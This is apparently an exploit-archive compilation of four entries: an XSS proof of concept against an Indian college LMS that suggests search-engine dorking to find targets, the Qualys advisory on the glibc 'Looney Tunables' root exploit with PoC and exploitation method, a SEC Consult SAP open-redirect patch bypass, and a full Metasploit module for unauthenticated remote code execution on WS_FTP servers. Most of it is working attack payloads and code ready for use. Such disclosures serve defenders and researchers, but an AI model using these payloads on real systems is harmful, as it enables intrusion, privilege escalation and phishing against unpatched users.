<pre><code>====================================================================================================================================<br />| # Title : Aicte india LMS 3.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : https://www.facebook.com/OfficialAICTE/ | <br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : /committee.php?n=ANTI-RAGGING'"()%26%25<acx><ScRiPt >prompt(926233)</ScRiPt><br /><br />[+] http://vtcbcsreduin/committee.php?n=ANTI-RAGGING%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(926233)%3C/ScRiPt%3E<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code><br />Qualys Security Advisory<br /><br />Looney Tunables: Local Privilege Escalation in the glibc's ld.so<br />(CVE-2023-4911)<br /><br /><br />========================================================================<br />Contents<br />========================================================================<br /><br />Summary<br />Analysis<br />Proof of concept<br />Exploitation<br />Acknowledgments<br />Timeline<br /><br /><br />========================================================================<br />Summary<br />========================================================================<br /><br />The GNU C Library's dynamic loader "find[s] and load[s] the shared<br />objects (shared libraries) needed by a program, prepare[s] the program<br />to run, and then run[s] it" (man ld.so). The dynamic loader is extremely<br />security sensitive, because its code runs with elevated privileges when<br />a local user executes a set-user-ID program, a set-group-ID program, or<br />a program with capabilities. Historically, the processing of environment<br />variables such as LD_PRELOAD, LD_AUDIT, and LD_LIBRARY_PATH has been a<br />fertile source of vulnerabilities in the dynamic loader.<br /><br />Recently, we discovered a vulnerability (a buffer overflow) in the<br />dynamic loader's processing of the GLIBC_TUNABLES environment variable<br />(https://www.gnu.org/software/libc/manual/html_node/Tunables.html). This<br />vulnerability was introduced in April 2021 (glibc 2.34) by commit 2ed18c<br />("Fix SXID_ERASE behavior in setuid programs (BZ #27471)").<br /><br />We successfully exploited this vulnerability and obtained full root<br />privileges on the default installations of Fedora 37 and 38, Ubuntu<br />22.04 and 23.04, Debian 12 and 13; other distributions are probably also<br />vulnerable and exploitable (one notable exception is Alpine Linux, which<br />uses musl libc, not the glibc). We will not publish our exploit for now;<br />however, this buffer overflow is easily exploitable (by transforming it<br />into a data-only attack), and other researchers might publish working<br />exploits shortly after this coordinated disclosure.<br /><br /><br />========================================================================<br />Analysis<br />========================================================================<br /><br />At the very beginning of its execution, ld.so calls __tunables_init() to<br />walk through the environment (at line 279), searching for GLIBC_TUNABLES<br />variables (at line 282); for each GLIBC_TUNABLES that it finds, it makes<br />a copy of this variable (at line 284), calls parse_tunables() to process<br />and sanitize this copy (at line 286), and finally replaces the original<br />GLIBC_TUNABLES with this sanitized copy (at line 288):<br /><br />------------------------------------------------------------------------<br />269 void<br />270 __tunables_init (char **envp)<br />271 {<br />272 char *envname = NULL;<br />273 char *envval = NULL;<br />274 size_t len = 0;<br />275 char **prev_envp = envp;<br />...<br />279 while ((envp = get_next_env (envp, &envname, &len, &envval,<br />280 &prev_envp)) != NULL)<br />281 {<br />282 if (tunable_is_name ("GLIBC_TUNABLES", envname))<br />283 {<br />284 char *new_env = tunables_strdup (envname);<br />285 if (new_env != NULL)<br />286 parse_tunables (new_env + len + 1, envval);<br />287 /* Put in the updated envval. */<br />288 *prev_envp = new_env;<br />289 continue;<br />290 }<br />------------------------------------------------------------------------<br /><br />The first argument of parse_tunables() (tunestr) points to the<br />soon-to-be-sanitized copy of GLIBC_TUNABLES, while the second argument<br />(valstring) points to the original GLIBC_TUNABLES environment variable<br />(in the stack). To sanitize the copy of GLIBC_TUNABLES (which should be<br />of the form "tunable1=aaa:tunable2=bbb"), parse_tunables() removes all<br />dangerous tunables (the SXID_ERASE tunables) from tunestr, but keeps<br />SXID_IGNORE and NONE tunables (at lines 221-235):<br /><br />------------------------------------------------------------------------<br />162 static void<br />163 parse_tunables (char *tunestr, char *valstring)<br />164 {<br />...<br />168 char *p = tunestr;<br />169 size_t off = 0;<br />170 <br />171 while (true)<br />172 {<br />173 char *name = p;<br />174 size_t len = 0;<br />175 <br />176 /* First, find where the name ends. */<br />177 while (p[len] != '=' && p[len] != ':' && p[len] != '\0')<br />178 len++;<br />179 <br />180 /* If we reach the end of the string before getting a valid name-value<br />181 pair, bail out. */<br />182 if (p[len] == '\0')<br />183 {<br />184 if (__libc_enable_secure)<br />185 tunestr[off] = '\0';<br />186 return;<br />187 }<br />188 <br />189 /* We did not find a valid name-value pair before encountering the<br />190 colon. */<br />191 if (p[len]== ':')<br />192 {<br />193 p += len + 1;<br />194 continue;<br />195 }<br />196 <br />197 p += len + 1;<br />198 <br />199 /* Take the value from the valstring since we need to NULL terminate it. */<br />200 char *value = &valstring[p - tunestr];<br />201 len = 0;<br />202 <br />203 while (p[len] != ':' && p[len] != '\0')<br />204 len++;<br />205 <br />206 /* Add the tunable if it exists. */<br />207 for (size_t i = 0; i < sizeof (tunable_list) / sizeof (tunable_t); i++)<br />208 {<br />209 tunable_t *cur = &tunable_list[i];<br />210 <br />211 if (tunable_is_name (cur->name, name))<br />212 {<br />...<br />219 if (__libc_enable_secure)<br />220 {<br />221 if (cur->security_level != TUNABLE_SECLEVEL_SXID_ERASE)<br />222 {<br />223 if (off > 0)<br />224 tunestr[off++] = ':';<br />225 <br />226 const char *n = cur->name;<br />227 <br />228 while (*n != '\0')<br />229 tunestr[off++] = *n++;<br />230 <br />231 tunestr[off++] = '=';<br />232 <br />233 for (size_t j = 0; j < len; j++)<br />234 tunestr[off++] = value[j];<br />235 }<br />236 <br />237 if (cur->security_level != TUNABLE_SECLEVEL_NONE)<br />238 break;<br />239 }<br />240 <br />241 value[len] = '\0';<br />242 tunable_initialize (cur, value);<br />243 break;<br />244 }<br />245 }<br />246 <br />247 if (p[len] != '\0')<br />248 p += len + 1;<br />249 }<br />250 }<br />------------------------------------------------------------------------<br /><br />Unfortunately, if a GLIBC_TUNABLES environment variable is of the form<br />"tunable1=tunable2=AAA" (where "tunable1" and "tunable2" are SXID_IGNORE<br />tunables, for example "glibc.malloc.mxfast"), then:<br /><br />- during the first iteration of the "while (true)" in parse_tunables(),<br /> the entire "tunable1=tunable2=AAA" is copied in-place to tunestr (at<br /> lines 221-235), thus filling up tunestr;<br /><br />- at lines 247-248, p is not incremented (p[len] is '\0' because no ':'<br /> was found at lines 203-204) and therefore p still points to the value<br /> of "tunable1", i.e. "tunable2=AAA";<br /><br />- during the second iteration of the "while (true)" in parse_tunables(),<br /> "tunable2=AAA" is appended (as if it were a second tunable) to tunestr<br /> (which is already full), thus overflowing tunestr.<br /><br />A note on fuzzing: although we discovered this buffer overflow manually,<br />we later tried to fuzz the vulnerable function, parse_tunables(); both<br />AFL++ and libFuzzer re-discovered this overflow in less than a second,<br />when provided with a dictionary of tunables (which can be compiled by<br />running "ld.so --list-tunables").<br /><br /><br />========================================================================<br />Proof of concept<br />========================================================================<br /><br />$ env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help<br />Segmentation fault (core dumped)<br /><br /><br />========================================================================<br />Exploitation<br />========================================================================<br /><br />This vulnerability is a straightforward buffer overflow, but what should<br />we overwrite to achieve arbitrary code execution? The buffer we overflow<br />is allocated at line 284 by tunables_strdup(), a re-implementation of<br />strdup() that uses ld.so's __minimal_malloc() instead of the glibc's<br />malloc() (indeed, the glibc's malloc() has not been initialized yet).<br />This __minimal_malloc() implementation simply calls mmap() to obtain<br />more memory from the kernel.<br /><br />The question, then, is: what writable pages can we overwrite in the mmap<br />region? To the best of our knowledge, we have only two options (because<br />this buffer overflow takes place at the very beginning of ld.so's<br />execution):<br /><br />1/ The read-write ELF segment of ld.so itself (the first pages of this<br />read-write segment are actually ld.so's RELRO segment, but they have not<br />been mprotect()ed read-only yet):<br /><br />------------------------------------------------------------------------<br />7f209f367000-7f209f369000 r--p 00000000 fd:00 10943 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2<br />7f209f369000-7f209f393000 r-xp 00002000 fd:00 10943 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2<br />7f209f393000-7f209f39e000 r--p 0002c000 fd:00 10943 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2<br />7f209f39f000-7f209f3a3000 rw-p 00037000 fd:00 10943 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2<br />------------------------------------------------------------------------<br /><br />However, on all the Linux distributions that we checked, the unmapped<br />hole immediately below ld.so's read-write segment is at most one page,<br />but ld.so's __minimal_malloc() always allocates at least two pages ("one<br />extra page to reduce number of mmap calls"). In other words, the buffer<br />we overflow cannot be allocated immediately below ld.so's read-write<br />segment, and therefore cannot overwrite this segment.<br /><br />2/ Our only option, then, is to overwrite mmap()ed pages that were<br />allocated by tunables_strdup() itself: because __tunables_init() can<br />process multiple GLIBC_TUNABLES environment variables, and because the<br />Linux kernel's mmap() is a top-down allocator, we can mmap() a first<br />GLIBC_TUNABLES (without overflowing it), mmap() a second GLIBC_TUNABLES<br />(immediately below the first one) and overflow it, thus overwriting the<br />first GLIBC_TUNABLES. As a result, we can:<br /><br />- either replace this first GLIBC_TUNABLES with a completely different<br /> environment variable, for example LD_PRELOAD or LD_LIBRARY_PATH -- but<br /> these dangerous variables are later removed from the environment by<br /> ld.so (in process_envvars()), and such a replacement would therefore<br /> be useless;<br /><br />- or replace the first GLIBC_TUNABLES with a GLIBC_TUNABLES that<br /> contains dangerous (SXID_ERASE) tunables, which were previously<br /> removed by parse_tunables() -- although this seems promising at first,<br /> exploiting such a replacement would require a SUID-root program that<br /> setuid(0)s and execve()s another program with a preserved environment<br /> (to process the dangerous GLIBC_TUNABLES as root, but without<br /> __libc_enable_secure).<br /><br /> Alas, we do not know of such a SUID-root program on Linux (on OpenBSD,<br /> /usr/bin/chpass setuid(0)s and execv()s /usr/sbin/pwd_mkdb, and was<br /> exploited in CVE-2019-19726); if you, dear reader, know of such a<br /> SUID-root program on Linux, please let us know!<br /><br />At that point, the situation looked quite hopeless, but a comment in<br />ld.so's _dl_new_object() (which is called long after __tunables_init())<br />caught our attention (at line 105):<br /><br />------------------------------------------------------------------------<br /> 56 struct link_map *<br /> 57 _dl_new_object (char *realname, const char *libname, int type,<br /> 58 struct link_map *loader, int mode, Lmid_t nsid)<br /> 59 {<br /> ..<br /> 84 struct link_map *new;<br /> 85 struct libname_list *newname;<br /> ..<br /> 92 new = (struct link_map *) calloc (sizeof (*new) + audit_space<br /> 93 + sizeof (struct link_map *)<br /> 94 + sizeof (*newname) + libname_len, 1);<br /> 95 if (new == NULL)<br /> 96 return NULL;<br /> 97 <br /> 98 new->l_real = new;<br /> 99 new->l_symbolic_searchlist.r_list = (struct link_map **) ((char *) (new + 1)<br />100 + audit_space);<br />101 <br />102 new->l_libname = newname<br />103 = (struct libname_list *) (new->l_symbolic_searchlist.r_list + 1);<br />104 newname->name = (char *) memcpy (newname + 1, libname, libname_len);<br />105 /* newname->next = NULL; We use calloc therefore not necessary. */<br />------------------------------------------------------------------------<br /><br />ld.so allocates the memory for this link_map structure with calloc(),<br />and therefore does not explicitly initialize various of its members to<br />zero; this is a reasonable optimization. As mentioned earlier, calloc()<br />here is not the glibc's calloc() but ld.so's __minimal_calloc(), which<br />calls __minimal_malloc() *without* explicitly initializing the memory it<br />returns to zero; this is also a reasonable optimization, because for all<br />intents and purposes __minimal_malloc() always returns a clean chunk of<br />mmap()ed memory, which is guaranteed to be initialized to zero by the<br />kernel.<br /><br />Unfortunately, the buffer overflow in parse_tunables() allows us to<br />overwrite clean mmap()ed memory with non-zero bytes, thereby overwriting<br />pointers of the soon-to-be-allocated link_map structure with non-NULL<br />values. This allows us to completely break the logic of ld.so, which<br />assumes that these pointers are NULL.<br /><br />We first tried to exploit this buffer overflow by overwriting the<br />link_map structure's l_next and l_prev pointers (a doubly linked list of<br />link_map structures), but we failed because of two assert()ion failures<br />in setup_vdso(), which immediately abort() ld.so (all the distributions<br />that we checked compile their glibc, and hence ld.so, with assert()ions<br />enabled):<br /><br />------------------------------------------------------------------------<br /> 96 assert (l->l_next == NULL);<br /> 97 assert (l->l_prev == main_map);<br />------------------------------------------------------------------------<br /><br />We then realized that many more pointers in the link_map structure are<br />not explicitly initialized to NULL; in particular, the pointers to<br />Elf64_Dyn structures in the l_info[] array of pointers. Among these,<br />l_info[DT_RPATH], the "Library search path", immediately stood out: if<br />we overwrite this pointer and control where and what it points to, then<br />we can force ld.so to trust a directory that we own, and therefore to<br />load our own libc.so.6 or LD_PRELOAD library from this directory, and<br />execute arbitrary code (as root, if we run ld.so through a SUID-root<br />program).<br /><br />------------------------------------------------------------------------<br /><br />Where should the overwritten l_info[DT_RPATH] point to? The easy answer<br />to this question is: the stack; more precisely, our environment strings<br />in the stack. On Linux, the stack is randomized in a 16GB region, and<br />our environment strings can occupy up to 6MB (_STK_LIM / 4 * 3, in the<br />kernel's bprm_stack_limits()): after 16GB / 6MB = 2730 tries we have a<br />good chance of guessing the address of our environment strings (in our<br />exploit, we always overwrite l_info[DT_RPATH] with 0x7ffdfffff010, the<br />center of the randomized stack region). In our tests, this brute force<br />takes ~30s on Debian, and ~5m on Ubuntu and Fedora (because of their<br />automatic crash handlers, Apport and ABRT; we have not tried to work<br />around this slowdown).<br /><br />------------------------------------------------------------------------<br /><br />What should the overwritten l_info[DT_RPATH] point to? In other words,<br />what should we store in our 6MB of environment strings? l_info[DT_RPATH]<br />is a pointer to a small (16B) Elf64_Dyn structure:<br /><br />- an int64_t d_tag, which should be DT_RPATH (15), but this value is<br /> never actually checked anywhere, so we can store anything there;<br /><br />- a uint64_t d_val, which is an offset into the ELF string table of the<br /> SUID-root program that is being executed (this offset references a<br /> string that is the "Library search path" itself).<br /><br />In our exploit, we simply fill our 6MB of environment strings with<br />0xfffffffffffffff8 (-8), because at an offset of -8B below the string<br />table of most SUID-root programs, the string "\x08" appears: this forces<br />ld.so to trust a relative directory named "\x08" (in our current working<br />directory), and therefore allows us to load and execute our own<br />libc.so.6 or LD_PRELOAD library from this directory, as root.<br /><br />------------------------------------------------------------------------<br /><br />One major problem remains unsolved, however: to avoid the kind of<br />assert()ion failures mentioned earlier (when we tried to overwrite the<br />l_next and l_prev pointers of the link_map structure), we must overwrite<br />the soon-to-be-allocated link_map structure with NULL pointers only<br />(except l_info[DT_RPATH], of course); but intuitively, the ability to<br />overflow a buffer with a large number of null bytes while parsing a<br />null-terminated C string sounds quite unusual.<br /><br />Luckily for us attackers, the bytes that are written out-of-bounds by<br />parse_tunables() are also read out-of-bounds (at line 234), but not from<br />the mmap()ed copy of our GLIBC_TUNABLES environment variable (tunestr),<br />but from our original GLIBC_TUNABLES environment variable in the stack<br />(valstring, at line 200). Consequently, if we store a large number of<br />empty strings (null bytes) immediately after our GLIBC_TUNABLES in the<br />stack, followed by the string "\x10\xf0\xff\xff\xfd\x7f", followed by<br />more empty strings (null bytes), then we safely overwrite the link_map<br />structure with null bytes (NULL pointers), except for l_info[DT_RPATH]<br />(which we overwrite with 0x7ffdfffff010, which points to our own<br />Elf64_Dyn structures in the stack with a probability of 1/2730).<br /><br />Final note: the exploitation method described in this advisory works<br />against almost all of the SUID-root programs that are installed by<br />default on Linux; a few exceptions are:<br /><br />- sudo on all distributions, because it specifies its own ELF RUNPATH<br /> (/usr/libexec/sudo), which overrides our l_info[DT_RPATH];<br /><br />- chage and passwd on Fedora, because they are protected by special<br /> SELinux rules;<br /><br />- snap-confine on Ubuntu, because it is protected by special AppArmor<br /> rules.<br /><br />Last-minute note: although glibc 2.34 is vulnerable to this buffer<br />overflow, its tunables_strdup() uses __sbrk(), not __minimal_malloc()<br />(which was introduced in glibc 2.35 by commit b05fae, "elf: Use the<br />minimal malloc on tunables_strdup"); we have not yet investigated<br />whether glibc 2.34 is exploitable or not.<br /><br /><br />========================================================================<br />Acknowledgments<br />========================================================================<br /><br />We thank Red Hat Product Security, Siddhesh Poyarekar, the members of<br />linux-distros@openwall, Salvatore Bonaccorso, and Solar Designer.<br /><br /><br />========================================================================<br />Timeline<br />========================================================================<br /><br />2023-09-04: Advisory and exploit sent to secalert@redhat.<br /><br />2023-09-19: Advisory and patch sent to linux-distros@openwall.<br /><br />2023-10-03: Coordinated Release Date (17:00 UTC).<br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20231005-0 ><br />=======================================================================<br /> title: Open Redirect in BSP Test Application it00<br /> (Bypass for CVE-2020-6215 Patch)<br /> product: SAP® Application Server ABAP and ABAP®<br /> Platform (SAP_BASIS)<br /> vulnerable version: see section "Vulnerable / tested versions"<br /> fixed version: see SAP security note 3258950<br /> CVE number: CVE-2020-6215<br /> impact: medium<br /> homepage: https://www.sap.com<br /> found: 2022-09-23<br /> by: Fabian Hagg (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"SAP is one of the world’s leading producers of software for the management of<br />business processes."[1]<br /><br />[1] https://www.sap.com/about/what-is-sap.html<br /><br /><br />Business recommendation:<br />------------------------<br />By exploiting the vulnerability documented in this advisory, attackers<br />can redirect users to arbitrary sites. Targeted users of such an<br />attack may be victims of successful phishing attempts jeopardizing the<br />confidentiality of logon information or other data.<br /><br />SEC Consult recommends to implement the security note 3258950, where the<br />documented issue is fixed according to the vendor. We advise installing<br />the correction as a matter of priority to keep business-critical data secure.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Open Redirect Vulnerability (Patch bypass of CVE-2020-6215)<br />The sample Business Server Pages (BSP) application it00 suffers from an open<br />redirect vulnerability that is referred to by CVE-2020-6215 [2]. A patch<br />for this issue was made available via SAP Security Note 2872782 [3].<br />During analysis, it was identified that the patch is insufficient and can<br />be bypassed.<br /><br />[2] https://nvd.nist.gov/vuln/detail/CVE-2020-6215<br />[3] https://me.sap.com/notes/2872782<br /><br /><br />Proof of concept:<br />-----------------<br />1) Open Redirect Vulnerability (Patch bypass of CVE-2020-6215)<br />The following source code excerpt of event handler OnInputProcessing() of<br />BSP subpage transition_navigation.htm shows that by the implementation of<br />SAP Security Note 2872782, an additional check was introduced that validates<br />the HTTP request parameter ‘applicationUrl’ against pseudo-headers ~server_name,<br />respectively ~server_name_expanded. Thus, to verify that the provided URL<br />complies with these values to only allow redirects to the local server,<br />the IF condition checks if the specified ‘applicationUrl’ parameter contains<br />the host name of the local server. Only if this check is evaluated successfully,<br />the browser of the calling user gets redirected to the intended page.<br /><br />---------------------------------------------------------------------------<br />[...]<br />when 'call'.<br /> data: url1 type string,<br /> url2 type string,<br /> host_name type string.<br /> host_name = request->get_header_field( '~server_name' ).<br /> if host_name is initial.<br /> host_name = request->get_header_field( '~server_name_expanded' ).<br /> endif.<br /> url = request->get_form_field( 'applicationUrl' ).<br /> if url cs host_name.<br /> split url at '?' into url1 url2.<br /> url2 = cl_abap_dyn_prg=>escape_xss_url( url2 ).<br /> concatenate url1 '?' url2 into url.<br /> navigation->call_application( url = url ).<br /> endif.<br />* negative test cases<br /> when 'error_no_such_exit'.<br /> navigation->next_page( 'NAVFAIL' ).<br /><br /><br />endcase.<br />---------------------------------------------------------------------------<br /><br />It was observed that this check can be bypassed, for example, by crafting<br />special HTTP requests that contain the host name of the target application<br />server (the PoC uses the <app server hostname> placeholder) within the query string<br />part of the URL provided via parameter ‘applicationUrl’. To validate this issue,<br />the following URL can be browsed to in order to trigger the vulnerability and<br />circumvent the implemented patch.<br /><br />---------------------------------------------------------------------------<br />http[s]://<app server hostname>:<ICM port>/sap/bc/bsp/sap/it00/transition_<br />navigation.htm?ApplicationURL=http://127.0.0.1:8080/?<app server hostname><br />&onInputProcessing%28call%29=Start+Application<br />---------------------------------------------------------------------------<br /><br />For demonstration purposes, after a successful login, the browser is redirected<br />by the application server to localhost on port 8080 (any other host/port pair<br />could by specified by the attacker).<br /><br />The server replies with a "302 Found" message redirecting the browser to the<br />localhost address defined in the response Location header field:<br /><br />---------------------------------------------------------------------------<br />HTTP/2 302 Found<br />Content-Type: text/html<br />Content-Length: 0<br />Location: http://127.0.0.1:8080/?<app server hostname>&sap-params=[...]<br />---------------------------------------------------------------------------<br /><br />An attacker can create a URL which would redirect the victim to a malicious<br />site, for example, a phishing site convincing the victim to login once again.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested and found to be vulnerable:<br /><br />- SAP_BASIS release 755, SP level 01<br /><br />According to the vendor the following releases and versions<br />are affected by the discovered vulnerability:<br /><br />- SAP_BASIS 700-702<br />- SAP_BASIS 731<br />- SAP_BASIS 740<br />- SAP_BASIS 750-757<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-10-03: Contacting vendor through vulnerability submission web form.<br />2022-10-04: Vendor confirms receipt and assigns internal ID #2270141902.<br />2022-10-19: Vendor confirms vulnerability and proposes new CVSS score of<br /> 5.4 (NLNR|U|LLN).<br />2022-10-24: Asking vendor why new CVSS rating differs from initial<br /> vulnerability rating. No response.<br />2022-11-24: Asking vendor for update.<br />2022-11-30: Vendor states that the patch is about to be released with the<br /> upcoming Patch Tuesday December 2022.<br />2022-12-13: Vendor releases patch with SAP Security Note 3258950.<br />2023-10-05: Release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provides a patched version which should be installed immediately.<br />Patches are available in form of SAP Security Notes which can be accessed<br />via the SAP Customer Launchpad [4]. More information can also be found in<br />the Official SAP Security Patchday Blog [5].<br /><br />The following Security Note needs to be implemented: 3258950<br /><br />[4] https://me.sap.com/app/securitynotes<br />[5] https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10<br /><br /><br />Workaround:<br />-----------<br />Disable BSP test application it00 in the ICF service tree in transaction<br />SICF.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF F. Hagg / @2023<br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Progress Software WS_FTP Unauthenticated Remote Code Execution',<br /> 'Description' => %q{<br /> This module exploits an unsafe .NET deserialization vulnerability to achieve unauthenticated remote code<br /> execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP Server<br /> prior to 2020.0.4 (version 8.7.4) and 2022.0.2 (version 8.8.2) are vulnerable to this issue. The vulnerability<br /> was originally discovered by AssetNote.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'sfewer-r7', # MSF Exploit & Rapid7 Analysis<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-40044'],<br /> ['URL', 'https://attackerkb.com/topics/bn32f9sNax/cve-2023-40044/rapid7-analysis'],<br /> ['URL', 'https://community.progress.com/s/article/WS-FTP-Server-Critical-Vulnerability-September-2023'],<br /> ['URL', 'https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044']<br /> ],<br /> 'DisclosureDate' => '2023-09-27',<br /> 'Platform' => %w[win],<br /> 'Arch' => [ARCH_CMD],<br /> # 5000 will allow the powershell payloads to work as they require ~4200 bytes. Notably, the ClaimsPrincipal and<br /> # TypeConfuseDelegate (but not TextFormattingRunProperties) gadget chains will fail if Space is too large (e.g.<br /> # 8192 bytes), as the encoded payload command is padded with leading whitespace characters (0x20) to consume<br /> # all the available payload space via ./modules/nops/cmd/generic.rb).<br /> 'Payload' => { 'Space' => 5000 },<br /> 'Privileged' => false, # Code execution as `NT AUTHORITY\NETWORK SERVICE`.<br /> 'Targets' => [<br /> [<br /> 'Windows', {}<br /> ]<br /> ],<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true<br /> },<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> # This URI path can be anything so long as it begins with /AHT/. We default ot /AHT/ as it is less obvious in<br /> # the IIS logs as to what the request is for, however the user can change this as needed if required.<br /> Msf::OptString.new('TARGET_URI', [ false, 'Target URI used to exploit the deserialization vulnerability. Must begin with /AHT/', '/AHT/']),<br /> ]<br /> )<br /> end<br /><br /> def check<br /> # As the vulnerability lies in the WS_FTP Ad Hoc Transfer (AHT) module, we query the index HTML file for AHT.<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => '/AHT/AHT_UI/public/index.html'<br /> )<br /><br /> return CheckCode::Unknown('Connection failed') unless res<br /><br /> title = Nokogiri::HTML(res.body).xpath('//head/title')&.text<br /><br /> # We verify the target is running the AHT module, by inspecting the HTML heads title.<br /> if title == 'Ad Hoc Transfer'<br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => '/AHT/AHT_UI/public/js/app.min.js'<br /> )<br /><br /> return CheckCode::Unknown('Connection failed') unless res<br /><br /> # The patched versions were released on September 2023. We can query the date stamp in the app.min.js file<br /> # to see when this file was built. If it is before Sept 2023, then we have a vulnerable version of WS_FTP,<br /> # but if it was build on Sept 2023 or after, it is not vulnerable.<br /><br /> if res.code == 200 && res.body =~ %r{/\*! fileTransfer (\d+)-(\d+)-(\d+) \*/}<br /> day = ::Regexp.last_match(1).to_i<br /> month = ::Regexp.last_match(2).to_i<br /> year = ::Regexp.last_match(3).to_i<br /><br /> description = "Detected a build date of #{day}-#{month}-#{year}"<br /><br /> if year > 2023 || (year == 2023 && month >= 9)<br /> return CheckCode::Safe(description)<br /> end<br /><br /> return CheckCode::Appears(description)<br /> end<br /><br /> # If we couldn't get the JS build date, we at least know the target is WS_FTP with the Ad Hoc Transfer module.<br /> return CheckCode::Detected<br /> end<br /><br /> CheckCode::Unknown<br /> end<br /><br /> def exploit<br /> unless datastore['TARGET_URI'].start_with? '/AHT/'<br /> fail_with(Failure::BadConfig, 'The TARGET_URI must begin with /AHT/')<br /> end<br /><br /> # All of these gadget chains will work. We pick a random one during exploitation.<br /> chains = %i[ClaimsPrincipal TypeConfuseDelegate TextFormattingRunProperties]<br /><br /> gadget = ::Msf::Util::DotNetDeserialization.generate(<br /> payload.encoded,<br /> gadget_chain: chains.sample,<br /> formatter: :BinaryFormatter<br /> )<br /><br /> # We can reach the unsafe deserialization via either of these tags. We pick a random one during exploitation.<br /> tags = %w[AHT_DEFAULT_UPLOAD_PARAMETER AHT_UPLOAD_PARAMETER]<br /><br /> message = Rex::MIME::Message.new<br /><br /> part = message.add_part("::#{tags.sample}::#{Rex::Text.encode_base64(gadget)}\r\n", nil, nil, nil)<br /><br /> part.header.set('name', rand_text_alphanumeric(8))<br /><br /> res = send_request_cgi(<br /> {<br /> 'uri' => normalize_uri(datastore['TARGET_URI']),<br /> 'ctype' => 'multipart/form-data; boundary=' + message.bound,<br /> 'method' => 'POST',<br /> 'data' => message.to_s<br /> }<br /> )<br /><br /> unless res&.code == 302<br /> fail_with(Failure::UnexpectedReply, 'Failed to trigger vulnerability')<br /> end<br /> end<br /><br />end<br /></code></pre>
